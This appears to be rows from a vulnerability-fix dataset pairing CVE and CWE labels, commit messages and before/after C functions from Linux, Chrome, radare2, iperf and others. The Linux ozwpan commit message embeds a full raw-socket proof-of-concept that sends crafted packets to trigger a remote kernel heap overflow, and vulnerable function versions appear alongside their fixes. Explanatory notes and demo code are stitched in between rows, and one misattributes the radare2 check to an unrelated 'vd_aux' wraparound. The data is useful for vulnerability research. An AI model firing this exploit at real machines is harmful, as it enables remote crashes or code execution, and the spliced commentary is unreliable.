static int read_reloc(ELFOBJ *bin, RBinElfReloc *r, int is_rela, ut64 offset) { ut8 *buf = bin->b->buf; int j = 0; if (offset + sizeof (Elf_ (Rela)) > bin->size || offset + sizeof (Elf_(Rela)) < offset) { return -1; } if (is_rela == DT_RELA) { Elf_(Rela) rela; #if R_BIN_ELF64 rela.r_offset = READ64 (buf + offset, j) rela.r_info = READ64 (buf + offset, j) rela.r_addend = READ64 (buf + offset, j) #else rela.r_offset = READ32 (buf + offset, j) rela.r_info = READ32 (buf + offset, j) rela.r_addend = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rela.r_offset; r->type = ELF_R_TYPE (rela.r_info); r->sym = ELF_R_SYM (rela.r_info); r->last = 0; r->addend = rela.r_addend; return sizeof (Elf_(Rela)); } else { Elf_(Rel) rel; #if R_BIN_ELF64 rel.r_offset = READ64 (buf + offset, j) rel.r_info = READ64 (buf + offset, j) #else rel.r_offset = READ32 (buf + offset, j) rel.r_info = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rel.r_offset; r->type = ELF_R_TYPE (rel.r_info); r->sym = ELF_R_SYM (rel.r_info); r->last = 0; return sizeof (Elf_(Rel)); } }
static int read_reloc(ELFOBJ *bin, RBinElfReloc *r, int is_rela, ut64 offset) { ut8 *buf = bin->b->buf; int j = 0; if (offset + sizeof (Elf_ (Rela)) > bin->size || offset + sizeof (Elf_(Rela)) < offset) { return -1; } if (is_rela == DT_RELA) { Elf_(Rela) rela; #if R_BIN_ELF64 rela.r_offset = READ64 (buf + offset, j) rela.r_info = READ64 (buf + offset, j) rela.r_addend = READ64 (buf + offset, j) #else rela.r_offset = READ32 (buf + offset, j) rela.r_info = READ32 (buf + offset, j) rela.r_addend = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rela.r_offset; r->type = ELF_R_TYPE (rela.r_info); r->sym = ELF_R_SYM (rela.r_info); r->last = 0; r->addend = rela.r_addend; return sizeof (Elf_(Rela)); } else { Elf_(Rel) rel; #if R_BIN_ELF64 rel.r_offset = READ64 (buf + offset, j) rel.r_info = READ64 (buf + offset, j) #else rel.r_offset = READ32 (buf + offset, j) rel.r_info = READ32 (buf + offset, j) #endif r->is_rela = is_rela; r->offset = rel.r_offset; r->type = ELF_R_TYPE (rel.r_info); r->sym = ELF_R_SYM (rel.r_info); r->last = 0; return sizeof (Elf_(Rel)); } }
C
radare2
0
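The guard at the top of read_reloc() above is the overflow-safe bounds-check idiom for untrusted offsets: "offset + need > size" alone is insufficient because the addition can wrap around to a small value, so a second comparison ("offset + need < offset") catches the wrap. A standalone demo of the same check:

```c
/* Overflow-safe bounds check for an untrusted offset, as used in
 * read_reloc() above to stop the huge-vd_aux pointer wraparound. */
#include <stdint.h>
#include <stdio.h>

static int in_bounds(uint64_t offset, uint64_t need, uint64_t size)
{
    if (offset + need > size ||   /* past the end of the buffer */
        offset + need < offset)   /* wrapped past UINT64_MAX */
        return 0;
    return 1;
}

int main(void)
{
    uint64_t size = 4096;
    printf("%d\n", in_bounds(100, 24, size));            /* 1: fits */
    printf("%d\n", in_bounds(4090, 24, size));           /* 0: past end */
    printf("%d\n", in_bounds(UINT64_MAX - 8, 24, size)); /* 0: wraps */
    return 0;
}
```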
CVE-2016-1640
https://www.cvedetails.com/cve/CVE-2016-1640/
CWE-17
https://github.com/chromium/chromium/commit/0a1c15fecb1240ab909e1431b6127410c3b380e0
0a1c15fecb1240ab909e1431b6127410c3b380e0
Make the webstore inline install dialog be tab-modal Also clean up a few minor lint errors while I'm in here. BUG=550047 Review URL: https://codereview.chromium.org/1496033003 Cr-Commit-Position: refs/heads/master@{#363925}
void ExpandableContainerView::DetailsView::AnimateToState(double state) { state_ = state; PreferredSizeChanged(); SchedulePaint(); }
void ExpandableContainerView::DetailsView::AnimateToState(double state) { state_ = state; PreferredSizeChanged(); SchedulePaint(); }
C
Chrome
0
CVE-2017-6310
https://www.cvedetails.com/cve/CVE-2017-6310/
CWE-125
https://github.com/verdammelt/tnef/commit/8dccf79857ceeb7a6d3e42c1e762e7b865d5344d
8dccf79857ceeb7a6d3e42c1e762e7b865d5344d
Check types to avoid invalid reads/writes.
confirm_action (const char *prompt, ...) { if (INTERACTIVE) { int confirmed = 0; char buf[BUFSIZ + 1]; va_list args; va_start (args, prompt); VPRINTF(stdout, prompt, args); fgets (buf, BUFSIZ, stdin); if (buf[0] == 'y' || buf[0] == 'Y') confirmed = 1; va_end (args); return confirmed; } return 1; }
confirm_action (const char *prompt, ...) { if (INTERACTIVE) { int confirmed = 0; char buf[BUFSIZ + 1]; va_list args; va_start (args, prompt); VPRINTF(stdout, prompt, args); fgets (buf, BUFSIZ, stdin); if (buf[0] == 'y' || buf[0] == 'Y') confirmed = 1; va_end (args); return confirmed; } return 1; }
C
tnef
0
CVE-2015-5707
https://www.cvedetails.com/cve/CVE-2015-5707/
CWE-189
https://github.com/torvalds/linux/commit/451a2886b6bf90e2fb378f7c46c655450fb96e81
451a2886b6bf90e2fb378f7c46c655450fb96e81
sg_start_req(): make sure that there's not too many elements in iovec unfortunately, allowing an arbitrary 16bit value means a possibility of overflow in the calculation of total number of pages in bio_map_user_iov() - we rely on there being no more than PAGE_SIZE members of sum in the first loop there. If that sum wraps around, we end up allocating too small array of pointers to pages and it's easy to overflow it in the second loop. X-Coverup: TINC (and there's no lumber cartel either) Cc: [email protected] # way, way back Signed-off-by: Al Viro <[email protected]>
static int sg_proc_seq_show_debug(struct seq_file *s, void *v) { struct sg_proc_deviter * it = (struct sg_proc_deviter *) v; Sg_device *sdp; unsigned long iflags; if (it && (0 == it->index)) seq_printf(s, "max_active_device=%d def_reserved_size=%d\n", (int)it->max, sg_big_buff); read_lock_irqsave(&sg_index_lock, iflags); sdp = it ? sg_lookup_dev(it->index) : NULL; if (NULL == sdp) goto skip; read_lock(&sdp->sfd_lock); if (!list_empty(&sdp->sfds)) { seq_printf(s, " >>> device=%s ", sdp->disk->disk_name); if (atomic_read(&sdp->detaching)) seq_puts(s, "detaching pending close "); else if (sdp->device) { struct scsi_device *scsidp = sdp->device; seq_printf(s, "%d:%d:%d:%llu em=%d", scsidp->host->host_no, scsidp->channel, scsidp->id, scsidp->lun, scsidp->host->hostt->emulated); } seq_printf(s, " sg_tablesize=%d excl=%d open_cnt=%d\n", sdp->sg_tablesize, sdp->exclude, sdp->open_cnt); sg_proc_debug_helper(s, sdp); } read_unlock(&sdp->sfd_lock); skip: read_unlock_irqrestore(&sg_index_lock, iflags); return 0; }
static int sg_proc_seq_show_debug(struct seq_file *s, void *v) { struct sg_proc_deviter * it = (struct sg_proc_deviter *) v; Sg_device *sdp; unsigned long iflags; if (it && (0 == it->index)) seq_printf(s, "max_active_device=%d def_reserved_size=%d\n", (int)it->max, sg_big_buff); read_lock_irqsave(&sg_index_lock, iflags); sdp = it ? sg_lookup_dev(it->index) : NULL; if (NULL == sdp) goto skip; read_lock(&sdp->sfd_lock); if (!list_empty(&sdp->sfds)) { seq_printf(s, " >>> device=%s ", sdp->disk->disk_name); if (atomic_read(&sdp->detaching)) seq_puts(s, "detaching pending close "); else if (sdp->device) { struct scsi_device *scsidp = sdp->device; seq_printf(s, "%d:%d:%d:%llu em=%d", scsidp->host->host_no, scsidp->channel, scsidp->id, scsidp->lun, scsidp->host->hostt->emulated); } seq_printf(s, " sg_tablesize=%d excl=%d open_cnt=%d\n", sdp->sg_tablesize, sdp->exclude, sdp->open_cnt); sg_proc_debug_helper(s, sdp); } read_unlock(&sdp->sfd_lock); skip: read_unlock_irqrestore(&sg_index_lock, iflags); return 0; }
C
linux
0
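The hardening described here caps an attacker-chosen 16-bit iovec element count before the per-element page sums in bio_map_user_iov() can wrap and under-allocate the page-pointer array. A minimal sketch of the pattern; the bound mirrors the kernel's UIO_MAXIOV, but the function and error values here are illustrative.

```c
/* Sketch of the sg_start_req() hardening above: refuse an oversized
 * iovec element count up front rather than risk the downstream
 * page-count overflow. Names are illustrative. */
#include <stdio.h>

#define UIO_MAXIOV 1024   /* the usual kernel bound for iovec elements */

static int start_req(unsigned short iov_count)
{
    if (iov_count > UIO_MAXIOV)
        return -22;  /* -EINVAL: reject instead of overflowing later */
    /* ... proceed to map iov_count elements ... */
    return 0;
}

int main(void)
{
    printf("%d\n", start_req(8));      /* 0 */
    printf("%d\n", start_req(65535));  /* -22 */
    return 0;
}
```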
null
null
null
https://github.com/chromium/chromium/commit/1161a49d663dd395bd639549c2dfe7324f847938
1161a49d663dd395bd639549c2dfe7324f847938
Don't populate URL data in WebDropData when dragging files. This is considered a potential security issue as well, since it leaks filesystem paths. BUG=332579 Review URL: https://codereview.chromium.org/135633002 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@244538 0039d316-1c4b-4281-b951-d872f2087c98
void OSExchangeDataProviderAura::SetPickledData( const OSExchangeData::CustomFormat& format, const Pickle& data) { pickle_data_[format] = data; formats_ |= OSExchangeData::PICKLED_DATA; }
void OSExchangeDataProviderAura::SetPickledData( const OSExchangeData::CustomFormat& format, const Pickle& data) { pickle_data_[format] = data; formats_ |= OSExchangeData::PICKLED_DATA; }
C
Chrome
0
CVE-2017-6991
https://www.cvedetails.com/cve/CVE-2017-6991/
CWE-119
https://github.com/chromium/chromium/commit/3bfe67c9c4b45eb713326aae7a67c8f7390dae08
3bfe67c9c4b45eb713326aae7a67c8f7390dae08
sqlite: safely move pointer values through SQL. This lands https://www.sqlite.org/src/timeline?c=d6a44b35 in third_party/sqlite/src/ and third_party/sqlite/patches/0013-Add-new-interfaces-sqlite3_bind_pointer-sqlite3_resu.patch and re-generates third_party/sqlite/amalgamation/* using the script at third_party/sqlite/google_generate_amalgamation.sh. The CL also adds a layout test that verifies the patch works as intended. BUG=742407 Change-Id: I2e1a457459cd2e975e6241b630e7b79c82545981 Reviewed-on: https://chromium-review.googlesource.com/572976 Reviewed-by: Chris Mumford <[email protected]> Commit-Queue: Victor Costan <[email protected]> Cr-Commit-Position: refs/heads/master@{#487275}
static const Mem *columnNullValue(void){ /* Even though the Mem structure contains an element ** of type i64, on certain architectures (x86) with certain compiler ** switches (-Os), gcc may align this Mem object on a 4-byte boundary ** instead of an 8-byte one. This all works fine, except that when ** running with SQLITE_DEBUG defined the SQLite code sometimes assert()s ** that a Mem structure is located on an 8-byte boundary. To prevent ** these assert()s from failing, when building with SQLITE_DEBUG defined ** using gcc, we force nullMem to be 8-byte aligned using the magical ** __attribute__((aligned(8))) macro. */ static const Mem nullMem #if defined(SQLITE_DEBUG) && defined(__GNUC__) __attribute__((aligned(8))) #endif = { /* .u = */ {0}, /* .flags = */ (u16)MEM_Null, /* .enc = */ (u8)0, /* .eSubtype = */ (u8)0, /* .n = */ (int)0, /* .z = */ (char*)0, /* .zMalloc = */ (char*)0, /* .szMalloc = */ (int)0, /* .uTemp = */ (u32)0, /* .db = */ (sqlite3*)0, /* .xDel = */ (void(*)(void*))0, #ifdef SQLITE_DEBUG /* .pScopyFrom = */ (Mem*)0, /* .pFiller = */ (void*)0, #endif }; return &nullMem; }
static const Mem *columnNullValue(void){ /* Even though the Mem structure contains an element ** of type i64, on certain architectures (x86) with certain compiler ** switches (-Os), gcc may align this Mem object on a 4-byte boundary ** instead of an 8-byte one. This all works fine, except that when ** running with SQLITE_DEBUG defined the SQLite code sometimes assert()s ** that a Mem structure is located on an 8-byte boundary. To prevent ** these assert()s from failing, when building with SQLITE_DEBUG defined ** using gcc, we force nullMem to be 8-byte aligned using the magical ** __attribute__((aligned(8))) macro. */ static const Mem nullMem #if defined(SQLITE_DEBUG) && defined(__GNUC__) __attribute__((aligned(8))) #endif = { /* .u = */ {0}, /* .flags = */ (u16)MEM_Null, /* .enc = */ (u8)0, /* .eSubtype = */ (u8)0, /* .n = */ (int)0, /* .z = */ (char*)0, /* .zMalloc = */ (char*)0, /* .szMalloc = */ (int)0, /* .uTemp = */ (u32)0, /* .db = */ (sqlite3*)0, /* .xDel = */ (void(*)(void*))0, #ifdef SQLITE_DEBUG /* .pScopyFrom = */ (Mem*)0, /* .pFiller = */ (void*)0, #endif }; return &nullMem; }
C
Chrome
0
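The interfaces this patch imports (sqlite3_bind_pointer / sqlite3_result_pointer, available in stock SQLite since 3.20.0) tag host pointers with a type string, so SQL text can no longer forge a pointer from an attacker-controlled integer; to SQL, the bound value simply looks like NULL. A hedged usage sketch (error handling omitted; build with -lsqlite3):

```c
/* Usage sketch of sqlite3_bind_pointer() as named in the patch above:
 * the pointer is invisible to SQL and retrievable only under the
 * matching type tag. The tag "demo-ptr" is illustrative. */
#include <sqlite3.h>
#include <stdio.h>

int main(void)
{
    sqlite3 *db;
    sqlite3_stmt *stmt;
    int secret = 42;

    sqlite3_open(":memory:", &db);
    sqlite3_prepare_v2(db, "SELECT ?1", -1, &stmt, NULL);

    /* bind the pointer under a type tag; SQL sees the value as NULL */
    sqlite3_bind_pointer(stmt, 1, &secret, "demo-ptr", NULL);
    sqlite3_step(stmt);
    printf("SQL-visible type: %d (SQLITE_NULL=%d)\n",
           sqlite3_column_type(stmt, 0), SQLITE_NULL);

    sqlite3_finalize(stmt);
    sqlite3_close(db);
    return 0;
}
```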
CVE-2014-0131
https://www.cvedetails.com/cve/CVE-2014-0131/
CWE-416
https://github.com/torvalds/linux/commit/1fd819ecb90cc9b822cd84d3056ddba315d3340f
1fd819ecb90cc9b822cd84d3056ddba315d3340f
skbuff: skb_segment: orphan frags before copying skb_segment copies frags around, so we need to copy them carefully to avoid accessing user memory after reporting completion to userspace through a callback. skb_segment doesn't normally happen on datapath: TSO needs to be disabled - so disabling zero copy in this case does not look like a big deal. Signed-off-by: Michael S. Tsirkin <[email protected]> Acked-by: Herbert Xu <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void skb_trim(struct sk_buff *skb, unsigned int len) { if (skb->len > len) __skb_trim(skb, len); }
void skb_trim(struct sk_buff *skb, unsigned int len) { if (skb->len > len) __skb_trim(skb, len); }
C
linux
0
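"Orphan frags before copying" means: before a buffer backed by user memory (zero-copy) is referenced from a second place, take a private copy, so that signalling completion to the original owner cannot leave the clone pointing at reclaimed pages. A userspace analogue of the pattern; struct buf and orphan() are illustrative stand-ins, not the skb API.

```c
/* Conceptual sketch of "orphan frags before copying" from the commit
 * above: materialize a private copy of any borrowed (user-backed) buffer
 * before cloning it. Userspace analogue; names are illustrative. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct buf { char *data; size_t len; int borrowed; /* user-owned memory? */ };

static int orphan(struct buf *b)
{
    if (!b->borrowed)
        return 0;               /* already privately owned */
    char *own = malloc(b->len);
    if (!own)
        return -1;
    memcpy(own, b->data, b->len);
    b->data = own;
    b->borrowed = 0;
    return 0;
}

int main(void)
{
    char user_mem[] = "user payload";
    struct buf b = { user_mem, sizeof(user_mem), 1 };
    if (orphan(&b) != 0)        /* do this before any clone/segment step */
        return 1;
    /* completion can now be reported to the owner of user_mem; our copy
     * no longer aliases it */
    printf("safe copy: %s\n", b.data);
    free(b.data);
    return 0;
}
```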
CVE-2015-4002
https://www.cvedetails.com/cve/CVE-2015-4002/
CWE-119
https://github.com/torvalds/linux/commit/d114b9fe78c8d6fc6e70808c2092aa307c36dc8e
d114b9fe78c8d6fc6e70808c2092aa307c36dc8e
ozwpan: Use proper check to prevent heap overflow Since elt->length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) - 2 }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, 
.elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(0), .total_size = htole16(0), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <[email protected]> Acked-by: Dan Carpenter <[email protected]> Cc: stable <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; u16 offs, total_size; u8 data_len; if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) break; data_len = elt->length - (sizeof(struct oz_get_desc_rsp) - 1); offs = le16_to_cpu(get_unaligned(&body->offset)); total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); }
void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; int data_len = elt->length - sizeof(struct oz_get_desc_rsp) + 1; u16 offs = le16_to_cpu(get_unaligned(&body->offset)); u16 total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); }
C
linux
1
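The diff between func_before and func_after above is a classic length underflow: "elt->length - sizeof(struct oz_get_desc_rsp) + 1" computed without a lower-bound check goes negative, and once converted to size_t for memcpy it becomes an enormous copy length. A standalone demo of the failure and of the fixed order of operations; HDR_SIZE is an illustrative stand-in for the header size.

```c
/* Demo of the bug class fixed above: subtracting a header size from an
 * attacker-controlled u8 length without a lower-bound check underflows;
 * the fix checks the bound first and keeps the result in a u8. */
#include <stdint.h>
#include <stdio.h>

#define HDR_SIZE 8  /* stands in for sizeof(struct oz_get_desc_rsp) - 1 */

static int parse_len(uint8_t elt_length, uint8_t *out_len)
{
    /* the fix: reject short elements before subtracting */
    if (elt_length < HDR_SIZE)
        return -1;
    *out_len = (uint8_t)(elt_length - HDR_SIZE);
    return 0;
}

int main(void)
{
    uint8_t n;
    /* without the check: 3 - 8 = -5, i.e. (size_t)-5 bytes for memcpy */
    printf("naive data_len for length=3: %zu\n", (size_t)(3 - HDR_SIZE));
    printf("checked length=3: %s\n", parse_len(3, &n) ? "rejected" : "ok");
    if (parse_len(20, &n) == 0)
        printf("checked length=20 -> data_len=%u\n", n);
    return 0;
}
```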
CVE-2016-4303
https://www.cvedetails.com/cve/CVE-2016-4303/
CWE-119
https://github.com/esnet/iperf/commit/91f2fa59e8ed80dfbf400add0164ee0e508e412a
91f2fa59e8ed80dfbf400add0164ee0e508e412a
Fix a buffer overflow / heap corruption issue that could occur if a malformed JSON string was passed on the control channel. This issue, present in the cJSON library, was already fixed upstream, so was addressed here in iperf3 by importing a newer version of cJSON (plus local ESnet modifications). Discovered and reported by Dave McDaniel, Cisco Talos. Based on a patch by @dopheide-esnet, with input from @DaveGamble. Cross-references: TALOS-CAN-0164, ESNET-SECADV-2016-0001, CVE-2016-4303 (cherry picked from commit ed94082be27d971a5e1b08b666e2c217cf470a40) Signed-off-by: Bruce A. Mah <[email protected]>
cJSON *cJSON_GetObjectItem( cJSON *object, const char *string )
cJSON *cJSON_GetObjectItem( cJSON *object, const char *string ) { cJSON *c = object->child; while ( c && cJSON_strcasecmp( c->string, string ) ) c = c->next; return c; }
C
iperf
1
CVE-2019-13638
https://www.cvedetails.com/cve/CVE-2019-13638/
CWE-78
https://git.savannah.gnu.org/cgit/patch.git/commit/?id=3fcd042d26d70856e826a42b5f93dc4854d80bf0
3fcd042d26d70856e826a42b5f93dc4854d80bf0
null
fetchmode (char const *str) { const char *s; mode_t mode; while (ISSPACE ((unsigned char) *str)) str++; for (s = str, mode = 0; s < str + 6; s++) { if (*s >= '0' && *s <= '7') mode = (mode << 3) + (*s - '0'); else { mode = 0; break; } } if (*s == '\r') s++; if (*s != '\n') mode = 0; /* NOTE: The "diff --git" format always sets the file mode permission bits of symlinks to 0. (On Linux, symlinks actually always have 0777 permissions, so this is not even consistent.) */ return mode; }
fetchmode (char const *str) { const char *s; mode_t mode; while (ISSPACE ((unsigned char) *str)) str++; for (s = str, mode = 0; s < str + 6; s++) { if (*s >= '0' && *s <= '7') mode = (mode << 3) + (*s - '0'); else { mode = 0; break; } } if (*s == '\r') s++; if (*s != '\n') mode = 0; /* NOTE: The "diff --git" format always sets the file mode permission bits of symlinks to 0. (On Linux, symlinks actually always have 0777 permissions, so this is not even consistent.) */ return mode; }
C
savannah
0
CVE-2017-6001
https://www.cvedetails.com/cve/CVE-2017-6001/
CWE-362
https://github.com/torvalds/linux/commit/321027c1fe77f892f4ea07846aeae08cefbbb290
321027c1fe77f892f4ea07846aeae08cefbbb290
perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race Di Shen reported a race between two concurrent sys_perf_event_open() calls where both try and move the same pre-existing software group into a hardware context. The problem is exactly that described in commit: f63a8daa5812 ("perf: Fix event->ctx locking") ... where, while we wait for a ctx->mutex acquisition, the event->ctx relation can have changed under us. That very same commit failed to recognise sys_perf_event_context() as an external access vector to the events and thereby didn't apply the established locking rules correctly. So while one sys_perf_event_open() call is stuck waiting on mutex_lock_double(), the other (which owns said locks) moves the group about. So by the time the former sys_perf_event_open() acquires the locks, the context we've acquired is stale (and possibly dead). Apply the established locking rules as per perf_event_ctx_lock_nested() to the mutex_lock_double() for the 'move_group' case. This obviously means we need to validate state after we acquire the locks. Reported-by: Di Shen (Keen Lab) Tested-by: John Dias <[email protected]> Signed-off-by: Peter Zijlstra (Intel) <[email protected]> Cc: Alexander Shishkin <[email protected]> Cc: Arnaldo Carvalho de Melo <[email protected]> Cc: Arnaldo Carvalho de Melo <[email protected]> Cc: Jiri Olsa <[email protected]> Cc: Kees Cook <[email protected]> Cc: Linus Torvalds <[email protected]> Cc: Min Chong <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: Stephane Eranian <[email protected]> Cc: Thomas Gleixner <[email protected]> Cc: Vince Weaver <[email protected]> Fixes: f63a8daa5812 ("perf: Fix event->ctx locking") Link: http://lkml.kernel.org/r/[email protected] Signed-off-by: Ingo Molnar <[email protected]>
